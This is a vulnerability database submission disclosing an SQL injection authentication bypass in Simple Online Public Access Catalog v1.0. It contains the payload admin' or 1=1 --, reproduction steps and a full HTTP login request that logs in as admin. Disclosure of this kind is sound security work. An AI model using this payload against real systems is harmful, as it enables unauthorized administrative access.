ଜମା କରନ୍ତୁ #48126: Simple Online Public Access Catalog (OPAC) - SQL injectionସୂଚନା

ଶୀର୍ଷକSimple Online Public Access Catalog (OPAC) - SQL injection
ବର୍ଣ୍ଣନା# Exploit Title: Simple Online Public Access Catalog (OPAC) - SQL injection # Exploit Author: Vijay Reddy # Vendor Name: oretnom23 # Vendor Homepage: https://www.sourcecodester.com/php/15028/simple-online-public-access-catalog-opac-using-php-and-sqlite-free-source-code.html # Software Link: https://www.sourcecodester.com/php/15028/simple-online-public-access-catalog-opac-using-php-and-sqlite-free-source-code.html # Version: v1.0 # Tested on: Windows 11, Apache # CVE: ytd Description:- A SQL Injection issue in Simple Online Public Access Catalog (OPAC) v.1.0 allows an attacker to log in into admin account. ` Payload used:- admin' or 1=1 -- ` Parameter:- login id and password ` Steps to reproduce:- 1. First go to admin login 2. http://localhost/opac/admin/login.php 2. In that put the payload in username and password field 3. As you can see we got logged in #Request Body POST /opac/Actions.php?a=login HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0 Accept: application/json, text/javascript, /; q=0.01 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 57 Origin: http://localhost/ Connection: close Referer: http://localhost/opac/admin/login.php Cookie: PHPSESSID=42nj8l3fi0hg6lngdh385agpp5 Sec-Fetch-Dest: empty Sec-Fetch-Mode: cors Sec-Fetch-Site: same-origin username=admin'+or+1%3D1+--+&password=admin'+or+1%3D1+--+ Reference link github: https://github.com/Hakcoder/Simple-Online-Public-Access-Catalog-OPAC---SQL-injection/blob/main/POC
ଉପଭୋକ୍ତା
 VijayReddy (UID 33690)
ଦାଖଲ10/13/2022 05:27 PM (3 ବର୍ଷ ବର୍ଷ ago)
ମଧ୍ୟମ ଧରଣର10/13/2022 07:24 PM (2 hours later)
ସ୍ଥିତିଗ୍ରହଣ କରାଯାଇଛି
VulDB ଏଣ୍ଟ୍ରି210784 [SourceCodester Simple Online Public Access Catalog 1.0 Admin Login Actions.php?a=login username/password SQL ଇଞ୍ଜେକ୍ସନ]
ପଏଣ୍ଟ17

Do you know our Splunk app?

Download it now for free!